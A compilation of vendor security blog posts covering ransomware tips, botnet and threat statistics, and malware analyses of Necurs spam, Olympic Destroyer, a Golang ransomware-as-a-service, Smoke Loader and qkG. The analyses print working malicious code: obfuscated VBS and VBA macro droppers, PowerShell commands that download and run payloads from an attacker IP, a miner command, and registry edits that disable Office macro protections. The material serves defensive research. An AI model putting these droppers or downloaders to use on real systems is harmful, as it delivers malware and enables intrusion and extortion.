  • Backup your data—The best way to avoid the threat of being locked out of your critical files is to ensure that you always have backup copies of them, preferably in the cloud and on an external hard drive. This way, if you do get a ransomware infection, you can wipe your computer or device free and reinstall your files from backup. This is important not only because it protects your data, but because you are not tempted to reward the malware authors by paying a ransom.Microsoft users, for instance, can opt to use Office 365’s OneDrive Business cloud backup service to recover files. Backups won’t prevent ransomware, but it can mitigate the risks.
  • Use security software—Make sure all your computers and devices are protected with comprehensive security software, and keep all of your software up-to-date to safeguard you from the latest ransomware threats.
  • Practice Safe Surfing—Be careful where you click. Don’t respond to emails and text messages from people you don’t know, and only download applications from trusted sources. This is important since malware authors often use social engineering to try to get you to install dangerous files.
  • Only Use Secure Networks—Avoid using public Wi-Fi networks, since many of them are not secure, and cybercriminals can snoop on your internet usage. Instead, consider installing a VPN, which provides you with a secure connection to the Internet no matter where you go. 
  • Stay informed—Keep current on the latest threats. This way you know what to look out for. Finally, in the case that you do get a ransomware infection and have not backed up all your files, know that some decryption tools are made available by tech companies to help victims.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What’s New in the World of Ransomware? appeared first on McAfee Blogs.

Necurs Botnet Leads the World in Sending Spam Traffic

In Q4 2017 we found that the Necurs and Gamut botnets comprised 97% of spam botnet traffic. (See the McAfee Labs Threats Report, March 2018.) Necurs (at 60%) is currently the world’s largest spam botnet. The infected computers operate in a peer-to-peer model, with limited communication between the nodes and the control servers. Cybercriminals can rent access to the botnet to spread their own malicious campaigns.

The most common techniques are email attachments with macros or JavaScript to download malware from different locations. In October, the Locky ransomware campaign used Microsoft’s Dynamic Data Exchange to lure victims into “updating” the attached document with data from linked files—external links that delivered the malware.

In Q4 we noticed several botnet campaigns delivering the following payloads:

  • GlobeImposter ransomware
  • Locky ransomware
  • Scarab ransomware
  • Dridex banking Trojan

A timeline:

Let’s zoom in on one of the campaigns from the Necurs botnet. In the following example, an email automatically sent from a VOIP system informs the victim of a missed call. The email contains an attachment, a Visual Basic script.

In this case, the name is “Outside Caller 19-12-2017 [random nr].” Here is some of the script code:

Execute "Sub Aodunnecessarilybusinesslike(strr):ZabiT.Savetofile writenopopbusinesslikeInPlaceOf , 2 : End Sub"

Disaster = "//21+12:ptth21+12ex"+"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & "" 


This piece of code makes sure that the embedded code will be saved to a file. Note the second line of code: It is backward and calls the Windows script shell to execute the code. The following code string ensures that the backward line is read properly:

SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster),  "21+12")


The following line starts the saved code:

writenopopbusinesslikeMacAttack.Run("cmd."&"exe /c START """" "+" " & ArrArr ) 


Once the executable is started, it attempts to download the ransomware from the embedded URLs in the code: 

krapivec = Array("","","") 


The malware downloaded and executed is GlobeImposter ransomware. After encrypting all files and deleting the Volume Shadow copies to block file restore, the user is prompted with the request to buy the decryptor:

Spam botnets are one of the pillars of the cybercrime business. The authors of these botnets understand their market value and spend their rental income on continuous development. Their work keeps the infrastructure running, creates ever-changing spam messages, and delivers these messages to your inbox—with many avoiding spam blockers. This cybercrime effort should inspire your organization to discuss the implementation of DMARC (domain-based message authentication, reporting & conformance). To learn more about how DMARC can help protect against this kind of threat, visit For more on Necurs, see the McAfee Labs Threats Report, June 2017.

The post Necurs Botnet Leads the World in Sending Spam Traffic appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware

Today McAfee published the McAfee Labs Threats Report: March 2018. The report looks into the growth and trends of new malware, ransomware, and other threats in Q4 2017. McAfee Labs saw on average eight new threat samples per second, and the increasing use of fileless malware attacks leveraging Microsoft PowerShell. The Q4 spike in Bitcoin value prompted cybercriminals to focus on cryptocurrency hijacking through a variety of methods, including malicious Android apps.

Each quarter, McAfee Labs, led by the Advanced Threat Research team, assesses the state of the cyber threat landscape based on threat data gathered by the McAfee Global Threat Intelligence cloud from hundreds of millions of sensors across multiple threat vectors around the world. McAfee Advanced Threat Research complements McAfee Labs by providing in-depth investigative analysis of cyberattacks from around the globe.

Cybercriminals Take on New Strategies, Tactics

The fourth quarter of 2017 saw the rise of newly diversified cybercriminals, as a significant number of actors embraced novel criminal activities to capture new revenue streams. For instance, the spike in the value of Bitcoin prompted actors to branch out from moneymakers such as ransomware, to the practice of hijacking Bitcoin and Monero wallets. McAfee researchers discovered Android apps developed exclusively for the purpose of cryptocurrency mining and observed discussions in underground forums suggesting Litecoin as a safer model than Bitcoin, with less chance of exposure.

Cybercriminals also continued to adopt fileless malware leveraging Microsoft PowerShell, which surged 432% over the course of 2017, as the threat category became a go-to toolbox. The scripting language was used within Microsoft Office files to execute the first stage of attacks.

Health Care Targeted

Although publicly disclosed security incidents targeting health care decreased by 78% in the fourth quarter of 2017, the sector experienced a dramatic 210% overall increase in incidents in 2017. Through their investigations, McAfee Advanced Threat Research analysts conclude many incidents were caused by organizational failure to comply with security best practices or address known vulnerabilities in medical software.

McAfee Advanced Threat Research analysts looked into possible attack vectors related to health care data, finding exposed sensitive images and vulnerable software. Combining these attack vectors, analysts were able to reconstruct patient body parts, and create three-dimensional models.

Q4 2017 Threats Activity

Fileless malware. In Q4 JavaScript malware growth continued to slow with new samples decreasing by 9%, while new PowerShell malware more than tripled, growing 267%.

Security incidents. McAfee Labs counted 222 publicly disclosed security incidents in Q4, a decrease of 15% from Q3. 30% of all publicly disclosed security incidents in Q4 took place in the Americas, followed by 14% in Europe and 11% in Asia.

Vertical industry targets. Public, health care, education, and finance, respectively, led vertical sector security incidents for 2017.

  • Health Care. Disclosed incidents experienced a surge in 2017, rising 210%, while falling 78% in Q4.
  • Public sector. Disclosed incidents decreased 15% in 2017, down 37% in Q4.
  • Disclosed incidents rose 125% in 2017, remaining stagnant in Q4.
  • Disclosed incidents rose 16% in 2017, falling 29% in Q4. 

Regional targets

  • Disclosed incidents rose 46% in 2017, falling 46% in Q4.
  • Disclosed incidents fell 58% in 2017, rising 28% in Q4.
  • Disclosed incidents fell 20% in 2017, rising 18% in Q4.
  • Disclosed incidents rose 42% in 2017, falling 33% in Q4. 

Attack vectors. In Q4 and 2017 overall, malware led disclosed attack vectors, followed by account hijacking, leaks, distributed denial of service, and code injection.

Ransomware. The fourth quarter saw notable industry and law enforcement successes against criminals responsible for ransomware campaigns. New ransomware samples grew 59% over the last four quarters, while new ransomware samples growth rose 35% in Q4. The total number of ransomware samples increased 16% in the last quarter to 14.8 million samples.

Mobile malware. New mobile malware decreased by 35% from Q3. In 2017 total mobile malware experienced a 55% increase, while new samples declined by 3%.

Malware overall. New malware samples increased in Q4 by 32%. The total number of malware samples grew 10% in the past four quarters.

Mac malware. New Mac OS malware samples increased by 24% in Q4. Total Mac OS malware grew 58% in 2017.*

Macro malware. New macro malware increased by 53% in Q4, declined by 35% in 2017.

Spam campaigns. 97% of spam botnet traffic in Q4 was driven by Necurs—recent purveyor of “lonely girl” spam, pump-and-dump stock spam, and Locky ransomware downloaders—and by Gamut—sender of job offer–themed phishing and money mule recruitment emails.

*This blog post has been edited to correct the percentage increase of Mac OS malware in 2017.

For more information on these threat trends and statistics, please visit:

Twitter @Raj_Samani & @McAfee_Labs.

The post ‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware appeared first on McAfee Blogs.

Can’t Keep Up? 6 Easy Things You Can Do to Keep Your Kids Safe Online

Having a hard time doing what needs to be done to keep your kids safe online? Do you mentally shrink back when you realize you don’t do any of the tips experts so often recommend? Let the guilt go, parent because you are not alone.

Family life moves at warp speed. We want to keep up, we do everything we can to keep up, but sometimes — depending on the season of life — our best intentions get left on the roadside gulping dust.

So if you feel like you are falling behind, we put together this quick cheat sheet that will allow you to cover your safety bases and regain some ground on the technology front.

6 Easy Things You Can Do to Keep Your Kids Safe Online

Ask about apps

Restrictions on apps exist for a reason. Glance through your child’s home screen and ask about any app you don’t recognize. If you are unsure about an app’s functionality, audience, or risks, dig deeper. This step covers a lot of ground since apps are the #1 way tweens and teens gain access to mature content.

YouTube Safety Mode

Your kids probably spend a ton of time watching videos online andwho knows what their eyes have seen or what links they’ve clicked. What you may not realize is that YouTube has a safety feature that will block most inappropriate or sexual content from search, related videos, playlists, shows, and films. For kids under four, there’s YouTube Kids.

Google SafeSearch

While it’s not going to be as powerful as filtering software, Google has a SafeSearch feature that will filter explicit content (links, videos, and images) on any device. Google also has a reporting system if anything gets through their feature.

Verify Privacy Settings

This step is a five-minute conversation with your child that will remove some risks. If your child is on Facebook, Instagram, Snapchat or Twitter, make sure their privacy settings are marked “private.” This will keep anyone outside of their friend group from connecting with them. As part of the privacy settings chat, review strong password practices.

Relationship over rules

The #1 way to safeguard your kids against online risk, is making sure you have a strong relationship. Spend tech-free time together, listen and observe how your child uses and enjoys his or her devices. A healthy parent-child relationship is foundational to raising a wise digital citizen who can make good choices and handle issues such as cyberbullying, sexting, conflict, or online scams. Connect with your child daily. Talk about what’s new with school, their friends, and anything else important to them. Along the way, you’ll find out plenty about their online life and have the necessary permission (and trust) to work your concerns about online safety into any conversation.

Friend and follow but don’t stalk

Many parents cringe at the thought of opening a Twitter or Snapchat account, but if that is where your child spends most of his or her time, it’s time to open an account. It’s easy by the way. The wise rule here is that once you follow your child, give them space and privacy. Don’t chime in on the conversation or even compliment them. While they may appreciate your “likes” on Instagram, they aren’t too happy with “mom comments” as my daughter calls them. If you have a concern about a photo or comment your child has uploaded, handle it through a Direct Message or face to face but never in the public feed.

toni page birdsong



Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Can’t Keep Up? 6 Easy Things You Can Do to Keep Your Kids Safe Online appeared first on McAfee Blogs.

Olympic Destroyer: A new Candidate in South Korea

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

A new malware has recently made the headlines, targeting several computers during the opening ceremony of the Olympic Games Pyeongchang 2018. While Cisco Talos group, and later Endgame, have recently covered it, we noticed a couple of interesting aspects not previously addressed, we would like to share: its taste for hiding its traces, and the peculiar decryption routine. We also would like to pay attention on how the threat makes use of multiple components to breach the infected system. This knowledge allows us to improve our sandbox to be even more effective against emerging advanced threats, so we would like to share some of them.

The Olympic Destroyer

The malware is responsible for destroying (wiping out) files on network shares, making infected machines irrecoverable, and propagating itself with the newly harvested credentials across compromised networks.

To achieve this, the main executable file (sha1: 26de43cc558a4e0e60eddd4dc9321bcb5a0a181c) drops and runs the following components, all originally encrypted and embedded in the resource section:

  • a browsers credential stealer (sha1: 492d4a4a74099074e26b5dffd0d15434009ccfd9),
  • a system credential stealer (a Mimikatz-like DLL – sha1: ed1cd9e086923797fe2e5fe8ff19685bd2a40072 (for 64-bit OS), sha1: 21ca710ed3bc536bd5394f0bff6d6140809156cf (for 32-bit OS)),
  • a wiper component (sha1: 8350e06f52e5c660bb416b03edb6a5ddc50c3a59).
  • a legitimate signed copy of the PsExec utility used for the lateral movement (sha1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)

A wiper deleting data and logs

The wiper component is responsible for wiping the data from the network shares, but also destroying the attacked system by deleting backups, disabling services (Figure 1), clearing event logs using wevtutil, thereby making the infected machine unusable. The very similar behaviors have been previously observed in other Ransomware/Wiper attacks, including the infamous ones such as BadRabbit and NotPetya.

Disabling Windows services

Figure 1. Disabling Windows services

After wiping the files, the malicious component sleeps for an hour (probably, to be sure that the spawned thread managed to finish its job), and calls the InitiateSystemShutdownExW API with the system failure reason code (SHTDN_REASON_MAJOR_SYSTEM, 0x00050000) to shut down the system.

An unusual decryption to extract the resources

As mentioned before, the executables are stored encrypted inside the binary’s resource section. This is to prevent static extraction of the embedded files, thus slowing down the analysis process. Another reason of going “offline” (compared with e.g. the Smoke Loader) is to bypass any network-based security solutions (which, in turn, decreases the probability of detection). When the malware executes, they are loaded via the LoadResource API, and decrypted via the MMX/SSE instructions sometimes used by malware to bypass code emulation, this is what we’ve observed while debugging it. In this case, however, the instructions are used to implement AES encryption and MD5 hash function (instead of using standard Windows APIs, such as CryptEncrypt and CryptCreateHash) to decrypt the resources. The MD5 algorithm is used to generate the symmetric key, which is equal to MD5 of a hardcoded string “123”, and multiplied by 2.

The algorithms could be also identified by looking at some characteristic constants of

  1. The Rcon array used during the AES key schedule (see figure 2) and,
  2. The MD5 magic initialization constants.

The decrypted resources are then dropped in temporary directory and finally, executed.

Figure 2. AES key setup routine for resources decryption


An interesting aspect of the decryption is its usage of the SSE instructions. We exploited this peculiarity and hunted for other samples sharing the same code by searching for the associated codehash, for example. The later is a normalized representation of the code mnemonics included in the function block (see Figure 3) as produced by the Lastline sandbox, and exported as a part of the process snapshots).

Another interesting sample found during our investigation was (sha1: 84aa2651258a702434233a946336b1adf1584c49) with the harvested system credentials belonging to the Atos company, a technical provider of the Pyeongchang games (see here for more details).

Hardcoded credentials of an Olympic Destroyer targeted the ATOS company

Figure 3. Hardcoded credentials of an Olympic Destroyer targeted the ATOS company

A Shellcode Injection Wiping the Injector

Another peculiarity of the Olympic Destroyer is how it deletes itself after execution. While self-deletion is a common practice among malware, it is quite uncommon to see the injected shellcode taking care of it: the shellcode, once injected in a legitimate copy of notepad.exe, waits until the sample terminates, and then deletes it.

Checking whether the file is terminated or still running

Figure 4. Checking whether the file is terminated or still running

This is done first by calling CreateFileW API and checking whether the sample is still running (as shown in Figure 4); it then overwrites the file with a sequence of 0x00 byte, deletes it via DeleteFileW API, and finally exits the process.

The remainder of the injection process is very common and it is similar to what we have described in one of our previous blog posts: the malware first spawns a copy of notepad.exe by calling the CreateProcessW function; then allocates memory in the process by calling VirtualAllocEx, and writes shellcode in the allocated memory through WriteProcessMemory. Finally, it creates a remote thread for its execution via CreateRemoteThread.

Shellcode injection in a copy of notepad.exe

Figure 5. Shellcode injection in a copy of notepad.exe

Lastline Analysis Overview

Figure 6 shows how the analysis overview looks like when analyzing the sample discussed in this article:

Analysis overview of the Olympic Destroyer

Figure 6. Analysis overview of the Olympic Destroyer


In this article, we analyzed a variant of the Olympic Destroyer, a multi-component malware that steals credentials before making the targeted machines unusable by wiping out data on the network shares, and deleting backups. Additionally, the effort put into deleting its traces shows a deliberate attempt to hinder any forensic activity. We also have shown how Lastline found similar samples related to this attack based on an example of the decryption routine, and how we detect them. This is a perfect example of how the threats are continuously improving making them even stealthier, more difficult to extract and analyze.

Appendix: IoCsdivider-2-white

Olympic Destroyer
26de43cc558a4e0e60eddd4dc9321bcb5a0a181c (sample analyzed in this article)

The post Olympic Destroyer: A new Candidate in South Korea appeared first on Lastline.

Free Ransomware Available on Dark Web

The McAfee Advanced Threat Research team recently analyzed a ransomware-as-a-service threat that is available for free and without registration. This malware was first seen in July 2017 with the extension .shifr. It has now appeared in recent detections with the extension .cypher.


Ransomware-as-a-service is a cybercrime economic model that allows malware developers to earn money for their creations without the need to distribute their threats. Nontechnical criminals buy their wares and launch the infections, while paying the developers a percentage of their take. The developers run relatively few risks, and their customers do most of the work.

Some ransomware-as-a-service, such as RaaSberry, use subscriptions while others require registration to gain access to the ransomware. The ransomware developer hosts a service on the “dark web” that allows any buyer to create and modify the malware. For example, the buyer can add custom ransom notes and the amount of the payment. More advanced services offer features such as evasion techniques to avoid detection and analysis. The service can also offer a control server with an administration panel to manage each victim. This system is convenient for both the developer, who makes money by selling malware, and for buyers, who gain ready-to-deploy ransomware without needing any specific coding knowledge.

The underground economy behind this service is well organized, effectively offering a cybercrime infrastructure. Basically, the ransomware is available on a website. The buyer sets up the ransomware by adding a wallet address. The ransomware is then available to download. The buyer just needs to customize and spread the malware. When a victim pays the ransom, a percentage is delivered both to the buyer and to the malware coder.


The ransomware is available on the TOR network at hxxp://kdvm5fd6tn6jsbwh.onion. A web page guides buyers through the configuration process.

On the configuration page, a generic XMPP address suggests we may have found a demo version of the ransomware.

On the page, the buyer need only to add a Bitcoin wallet address and the amount of the ransom. Once that is done, the malware is generated and can be downloaded. With this malware, the developer earns a 10% commission on every payment. Now let’s look at the malware sample.

Dynamic Analysis 

When the malware launches on the victim’s system, it checks for an Internet connection. If there is none, it exits the process. Otherwise, it contacts the following addresses to download the encryption key:

Once the file is running, it creates several files on the system:

  • Encryption_key: the RSA key encrypted in AES
  • Lock_file: an indicator that the system is encrypted
  • Uuid_file: a reference for the infected machine. A TOR address is generated with this ID.

The encryption key is downloaded from hxxps://

The ransom note is created on the desktop.

The file “HOW_TO_DECRYPT_FILES.html” gives a link to the TOR network.

Once the files are encrypted, the ransom note is displayed in HTML and points to the TOR site hxxp://kdvm5fd6tn6jsbwh.onion/ with the ID of the infected machine.

Allegedly after payment, the victim can download the file decrypter.exe and unlock encrypted files, which have the extension .cypher.

The malware encrypts the following file extensions:

The targeted extensions include many picture and photography files related to Canon, Kodak, Sony, and others. There are also extensions for AutoCAD, Autodesk projects, scalable vector images, and Microsoft Office files. These files are mostly used by designers, photographers, architect—and many others.

Digging Deeper

The malware runs on 64-bit systems and is coded in Golang (“Go language,” from Google), a programming language similar to C with some improvements in error management. It is not common to find malware using Golang, although this is not the first time that we have analyzed such malware. This threat is pretty big compared with most other malware, larger than 5.5MB. The file size can make analysis more difficult and can also help evade hardcoded antimalware file-inspection sizes.

Reverse engineering in Golang is a bit different than other languages. Golang binaries are usually bigger than other executables. (By default, the compiler statically links the program’s libraries, resulting a bigger file.)

A drawback for attackers is that such big binaries can be easily detected on a corporate network. Large files are “noisier” and may appear suspicious when arriving from an external source. They can also be less convenient for attackers to deal with because they can make the infection process more difficult.

The first interesting function to analyze in a Golang binary is the “main_main.” The malware starts by gathering environment variables. It then checks whether the file “lock_file” exists in the directory C:\Users\<username>\AppData\Roaming.

The function “main_Exists” will check for the file. If it does not exist, the malware exits the process.

If the file does exist, the malware downloads the public key from the control server.

The malware contacts the address  hxxps://kdvm5fd6tn6jsbwh.onion/new_c/<nameofmalware>. The encryption public key is stored directly on the website.

This address is generated when the buyer creates the ransomware on the developer’s web page; thus the same malware encrypts files with the same public key.

The malware generates the AES key and tries to find any network share by querying the letters.

This function tries to find network shares:

Before a file is encrypted, the malware creates another file in C:\Users\<username>\AppData\Roaming\uuid_file to use as a victim identifier.

The malware encrypts the files using AES and deletes them after encryption with the function “os.remove” to avoid any simple forensic recovery.

The decrypter, which can be downloaded, works in a similar way but it requests the private key that the victims must pay for at hxxps:// The mechanism behind the encryption routine seems to be on the online server and the decryption key cannot be easily recovered.

The following information describes the decrypter.


Cybercrime-as-a-service is not new, yet it is now more widespread than ever. In this case, the malware is available for free but the ransomware developer earns a 10% fee from each victim who pays a ransom. The use of Golang is not common for malware. Most ransomware-as-a-service is not free, which could indicate this might be a demonstration version, or a proof of concept for future sale.

This malware is not advanced and was coded without evasion techniques, such as DGA, SSL for control, encryption, or even file compression. Looking at the targeted file extensions suggests the victims can range from general home or business users to the graphics industry. Although such malware is not difficult to analyze, it can be very destructive in a corporate environment.

Keep in mind that paying a ransom is no guarantee of receiving a decryption key. McAfee advises that you never pay a ransom. You can find further information and help on unlocking some ransomware threats at

McAfee detects this threat as Ransomware-FPDS!0F8CCEE515B8.


Indicators of Compromise


  • cb73927aa749f88134ab7874b15df898c014a35d519469f59b1c85d32fa69357
  • 0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c

IP address:

  • hxxp://kdvm5fd6tn6jsbwh.onion

Files created:

  • C:\Users\<username>\AppData\Roaming\uuid_file
  • C:\Users\<username>\AppData\Roaming\lock_file
  • C:\Users\<username>\AppData\Roaming\encryption_key
  • C:\Users\< username >\Desktop\HOW_TO_DECRYPT_FILES.html

Encryption extension:

  • .cypher



The post Free Ransomware Available on Dark Web appeared first on McAfee Blogs.

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

The UK Information Commission's Office (ICO) heavily criticised the Carphone Warehouse for security inadequacies and fined the company £400K following their 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers, was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack", where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number Carphone Warehouse's security failures, which included the use of software that was six years out of day,  lack of “rigorous controls” over who had login details to systems; no antivirus protection running on the servers holding data, the same root password being used on every individual server, which was known to “some 30-40 members of staff”; and the needless storage of full credit card details. The Carphone Warephone should thank their lucky stars the breach didn't occur after the General Data Protection Regulation comes into force, as with such a damning list of security failures, the company may well have been fined considerably more by ICO, when it is granted vastly greater financial sanctions and powers when the GDPR kicks in May.

The National Cyber Security Centre warned the UK national infrastructure faces serious nation-state attacks, stating it is a matter of a "when" not an "if". There also claims that the cyberattacks against the Ukraine in recent years was down to Russia testing and tuning it's nation-state cyberattacking capabilities. 

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPeyta ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet, the hacker then moved currency into a different wallet platform.

In the United States, 
the Federal Trade Commission (FTC) fined toy firm VTech US$ 650,000 (£482,000) for violating a US children's privacy laws. The FTC alleged the toy company violated (COPPA) Children's Online Privacy Protection Rule by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high valued target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January,  the Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents have doubled in 2017 and 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both the professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and the number of attacks skyrocketed during the course of the year, no surprise there.  

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.




Smoke Loader Campaign: When Defense Becomes a Numbers Game

Authored by Alexander Sevtsov
Edited by Stefano Ortolani


Everybody knows that PowerShell is a powerful tool to automate different tasks in Windows. Unfortunately, many bad actors know that it is also a sneaky way for malware to download its payload. A few days ago we stumbled upon an interesting macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16) that is making one too many assumptions about the underlying operating system, thus sometimes failing to execute.

The Malicious Document

The malicious document file consists of the following macro code:

Private Sub Document_Open()
    Dim abasekjsh() As Byte, bfjeslksl As String, izhkaheje As Long
    abasekjsh = StrConv(ThisDocument.BuiltInDocumentProperties(Chr(84) + Chr(105) + Chr(116) + 
Chr(108) + Chr(101)), vbFromUnicode)
    For izhkaheje = 0 To UBound(abasekjsh)
        abasekjsh(izhkaheje) = abasekjsh(izhkaheje) - 6
    Next izhkaheje
    bfjeslksl = StrReverse(StrConv(abasekjsh, vbUnicode))
    Shell (Replace(Replace(Split(bfjeslksl, "|")(1), Split(bfjeslksl, "|")(0), Chr(46)), 
"FPATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub

The macro itself is nothing special: it first reads the “Title” property by accessing the BuiltInDocumentProperties of the current document. The property value is then used to decode a PowerShell command line, which is eventually executed via the Shell method.

The PowerShell Downloader

Instead of using sophisticated evasion techniques, the malware relies on a feature available from PowerShell 3.0 onwards. To download the malicious code the command invokes the Invoke-WebRequest cmdlet:

powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile 
([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');powershell.exe -w 1 Start-Process -
Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');

This tiny detail has the side-effect of requiring Windows 8 and above for the command to complete successfully. Note that although PowerShell comes installed by default since Windows 7, PowerShell 3.0 is only available on Windows 7 as an optional update. Therefore any network activity can only be observed if the underlying operating system is at least Windows 8, or if Windows 7 has the specific update installed. In other words, the more diversity between our analysis environments, the more chances we can elicit the malicious behavior.

Payload – Smoke Loader

The payload is a variant of the Smoke Loader family (Figure 1) which shows quite a number of different activities when analyzed by the Lastline sandbox (sha1: f227820689bdc628de34cc9c21000f3d458a26bf):

Figure 1. Analysis overview of the Smoke Loader

As it often happens, signatures are not really informative as we can see in Figure 2.

Figure 2. VT detection of the Smoke Loader

The aim of this malware is to download other components by sending 5 different POST requests to microsoftoutlook[.]bit/email/send.php. While some are met with a 404 error, three are successful and download the following payloads:

  • GlobeImposter Ransomware eventually displaying the ransom note in Figure 3.
    Smoke Loader Ransom Note

    Figure 3. Ransom note of the GlobeImposter Ransomware delivered by the Smoke Loader.

  • Zeus trojan banker, also known as Zbot, capturing online banking sessions and stealing credentials from known FTP clients, such as FlashFXP, CuteFtp, WsFTP, FileZilla, BulletProof FTP, etc.
  • Monero CPU miner based on the open source XMRig project (as indicated by some of the strings included in the binary, see Figure 4). The command used to spawn the miner reveals some well-known pool id we have been seeing already:

wuauclt.exe -o stratum+tcp:// -u 
4FbnHbJZ2tAqPas12PV5F6te.smoke30+10000 -p x --safe

Figure 4. XMRig Monero CPU miner


It’s worth mentioning that it’s not the first time we have seen the IP address from which the loader is downloaded. Based on our intelligence records, another malicious VBA-based document file (sha1: 03a06782e60e7e7b724a0cafa19ee6c64ba2366b) called a similar PowerShell script that perfectly executed in a default Windows 7 installation:

powershell $webclient = new-object System.Net.WebClient;
$myurls = 'http://80.82.67[.]217/moo.jpg'.Split(',');
$path = $env: temp + '\~tmp.exe';
foreach($myurl in $myurls) {
    try {
        $webclient.DownloadFile($myurl.ToString(), $path);
        Start-Process $path;
    } catch {}

This variant downloads the payload by invoking the DownloadFile method from the System.Net.WebClient class, indeed a much more common (and backward compatible) approach to retrieve a remote resource.


There is an inherent problem with dynamic analysis: which version of the underlying operating system should be used? To address this issue, the Lastline engine is capable of running deep behavioral analysis on several different operating systems, increasing the probability of a successful execution. Moreover, application bundles (see previous article for more details) can be further used to shape the analysis environment when additional requirements are needed to elicit the malicious behavior.

Figure 5 shows what the analysis overview looks like when analyzing the sample discussed in this article: besides some reported structural anomalies, which are detected by our static document analysis, we can see that dynamic behaviors are exhibited only in Windows 10.

Figure 5. Analysis overview of the malicious macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16)


In this article, we analyzed a malicious macro-based document relying on a specific version of PowerShell, thereby delivering a highly sophisticated multi-component malware, Smoke Loader. This is achieved by calling a cmdlet normally not available on PowerShell as installed in Windows 7, showing once more that operating system diversity is a key requirement for successful dynamic analysis.

Appendix: IoCsdivider-2-white

The Malicious Document b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16
Smoke Loader f227820689bdc628de34cc9c21000f3d458a26bf
Monero CPU Miner 88eba5d205d85c39ced484a3aa7241302fd815e3
Zeus Trojan 54949587044a4e3732087a56bc1d36096b9f0075
GlobeImposter Ransomware f3cd914ba35a79317622d9ac47b9e4bfbc3b3b26
Smoke Loader C&C microsoftoutlook[.]bit

The post Smoke Loader Campaign: When Defense Becomes a Numbers Game appeared first on Lastline.

qkG: Simple Malware, Tricky Ransomware

By Oleg Boyarchuk and Stefano Ortolani


When ransomware behavior is clearly exhibited, it is relatively easy for a sandbox or a personal A/V to assert detection; after all, in its simplest form, ransomware malware must at least: (1) search for files to be encrypted, and (2) overwrite those files with their encrypted representation. Lastline Labs’ Alexander Sevtsov covered a deep dive on ransomware behavior not so long ago in Ransomware: Too Overt to Hide. Nevertheless, when it comes to detecting ransomware targeting specific files, things might get a tad more complicated. This is the case of qkG, a malware (sha1=a9174fec5d81977eee9de2658a92fa9e4de76dd4) designed to infect documents and encrypt their content (our friends at TrendMicro did an excellent job outlining the encryption process and uncovering the encryption key in this report).

How it Works

Documents infected by qkG come with an embedded VBA script that gets executed when the document is opened (note that macros must be manually enabled for the malicious code to execute). The VBA includes the following ransom note (which, incidentally, is unique and thus a good candidate for a YARA signature):

Signature = "I'm QkG@PTM17! by TNA@MHT-TT2"
sInfo = "Send $300 to BTC Address: 14zA1NdTgtesLWZxtysLQQtsuKzjFbpydg" & vbCrLf & "Contact Email:"

qkG infects the template file, resulting in any other document opened by the user to become infected. Obviously, in order to avoid suspicion, qkG immediately tries to lower the Microsoft Office security settings in order to both access the VBA object model and enable macros permanently:

System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "Acces" + "sVBOM") = 1
System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "VBAW" + "arnings") = 1

